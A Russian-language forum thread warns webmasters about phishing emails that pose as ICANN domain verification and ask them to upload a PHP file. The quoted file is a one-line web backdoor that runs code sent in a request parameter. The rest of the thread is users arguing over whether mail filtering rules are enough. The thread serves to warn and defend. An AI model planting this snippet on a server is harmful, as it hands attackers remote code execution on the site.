Спам по вебмастерам о подтверждении владении доменом. Будьте осторожны!

Тема в разделе "Смотри, не попадись...", создана пользователем AldeX, 18 июл 2017.

1. AldeX
    ТопикCтартер

AldeX

Сообщ:
    344
    Лайк:
    361
    Баллов:
    63
    25 янв 2014
    Сегодня приходит мне 2 письма.

Одно с темой "Необходимо активировать домен мой_домен.ру",
    Другое - с темой "Важная информация для администратора домена мой_домен.ру".

Текст письма:
    Уважаемый клиент!

В соответствии с изменениями, внесенными в правила ICANN, Вы должны подтвердить, что фактическое управление доменным именем мой_домен.ру осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменным именем, создайте в корневой директории сайта файл jkhglakdkds1d.php со следующим содержимым:

<?php
    assert(stripslashes($_REQUEST[REG]));
    ?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего сообщения и находиться на сервере до 3 августа 2017 года, 12:00 (UTC+03:00), в противном случае процедура подтверждения будет считаться непройденной.

Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено.

Внешне выглядит довольно убедительно - вот так:

Косяки в том, что адрес не тот и обращение не по имени. Но лично я сначала начал было оформлять этот файл, и только потом сообразил, что к чему.

Поэтому будьте осторожны!

valera-tik и ridli84 нравится это.
  2. spider_kevin

spider_kevin

Сообщ:
    592
    Лайк:
    572
    Баллов:
    93
    4 апр 2014
    Создайте фильтр в почте и подобные письма вы никогда не увидите, что может быть проще?
    17 год уже, а люди до сих пор, как из нулевых.

3. AldeX
    ТопикCтартер

AldeX

Сообщ:
    344
    Лайк:
    361
    Баллов:
    63
    25 янв 2014
    Я даже не знаю, что и ответить-то вам на это ) Видимо, вы гораздо умней меня и прочее бла-бла.

Я чуть не купился на это письмо. И если бы взгляд не зацепился за массив $_REQUEST[], мог бы и накосячить.

Но он зацепился. А у другого вебмастера может не зацепиться. Поэтому я решил предупредить.

ros20 и ELF-74 нравится это.
  4. spider_kevin

spider_kevin

Сообщ:
    592
    Лайк:
    572
    Баллов:
    93
    4 апр 2014
    Не понимаю, зачем игнорировать элементарные средства и говорить: "Мол я не настолько умён", так возьмите и прочитайте как это делается и забыдьте проблему фейковых писем навсегда. Опять же это простительно обычным юзерам, но вебмастеру ... мда...

Вот вам простой пример из жизни. У нас в соеднем офисе (с год назад), вот такие же юзеры пооткрывали письма и все компы зашифровал вирус-ширфровальщик. Из-за этого компания чуть не обанкротилась и понесла колоссальные убытки, а юзеверов жестко наказали.

5. AldeX
    ТопикCтартер

AldeX

Сообщ:
    344
    Лайк:
    361
    Баллов:
    63
    25 янв 2014
    Цель моего сообщения была немного в другом )
    Я давным-давно не попадаюсь на такие письма, смски, сообщения в вк и т.п.
    У меня не самая низкая квалификация )
    И, тем не менее, чуть не купился. И поэтому решил предупредить тех, у кого опыта может быть именно в таком вопросе меньше.

По поводу фильтрации. Мне не очень понятно, что конкретно вы имеете в виду. Думаю, остальным читателям темы аналогично )
    Поэтому если можете нормально пояснить - поясните, пожалуйста.
    А то сейчас рекомендация выглядит так: "хотите стать миллионером - почитайте в интернете, как это делается".

6. AldeX
    ТопикCтартер

AldeX

Сообщ:
    344
    Лайк:
    361
    Баллов:
    63
    25 янв 2014
    Случайный дубль сообщения

7. spider_kevin

spider_kevin

Сообщ:
    592
    Лайк:
    572
    Баллов:
    93
    4 апр 2014
    Вы людям дали "рыбу", а я "удочку"

А по поводу, фильтра, то тут нет никакой магии и тайных знаний. Любой сервис или софт имеет в арсенале "Правила фильтрации писем", вы создаёте папку\метку и к нему привязываете конкретную почту или группу почт. Когда письмо приходит, то оно идентифицируется и согласно созданным правилам обрабатывается (например, на него ставится метка), а если придёт фейк, то он упадёт в общий инбокс, вот и всё.

Поделиться этой страницей

--